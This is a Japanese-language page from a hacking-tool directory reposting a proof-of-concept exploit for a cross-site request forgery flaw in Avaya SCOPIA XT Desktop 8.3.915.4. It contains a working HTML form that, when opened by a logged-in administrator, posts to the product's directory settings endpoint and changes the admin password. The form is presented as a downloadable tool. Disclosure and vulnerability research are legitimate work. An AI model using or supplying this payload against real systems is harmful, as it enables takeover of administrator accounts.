Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — Avaya SCOPIA XT Desktopにおけるクロスサイトリクエストフォージェリ(CSRF)を実証する概念実証コード。アンチCSRFトークンなしで管理者パスワードの変更を可能にします。 | Kitploit
ツール/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

Avaya SCOPIA XT Desktopにおけるクロスサイトリクエストフォージェリ(CSRF)を実証する概念実証コード。アンチCSRFトークンなしで管理者パスワードの変更を可能にします。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
15年前未レビュー

SCOPIA XT Desktop バージョン 8.3.915.4 における CSRF の悪用

このPoCは、SCOPIA XT Desktop バージョン 8.3.915.4 におけるクロスサイトリクエストフォージェリ(CSRF)の悪用方法について説明します。


SCOPIAについて

ウェブサイト: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


クロスサイトリクエストフォージェリ(CSRF)について

クロスサイトリクエストフォージェリは、ワンクリック攻撃またはセッションライディングとも呼ばれ、CSRFまたはXSRFと略される、Webアプリケーションが信頼するユーザーから不正なコマンドが送信されるという、Webサイトに対する悪意のある攻撃手法の一種です。


概念実証 - 管理者パスワードの変更

1

「Directory and Authentication」ページで、管理者は自分のパスワードを変更できます。

2

Burp Suiteでリクエストをキャプチャしたところ、CSRFトークンが実装されておらず、唯一のセキュリティメカニズムがセッションCookieであることが確認できました。

6

この脆弱性を悪用するためのPoCとして、次のHTMLファイルを作成しました。

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

SCOPIA XT Desktop管理環境に対して有効なCookieを持つブラウザでこれを実行すると、adminユーザーのパスワードを「attacker」に変更することができました。

4

5

ツールをダウンロード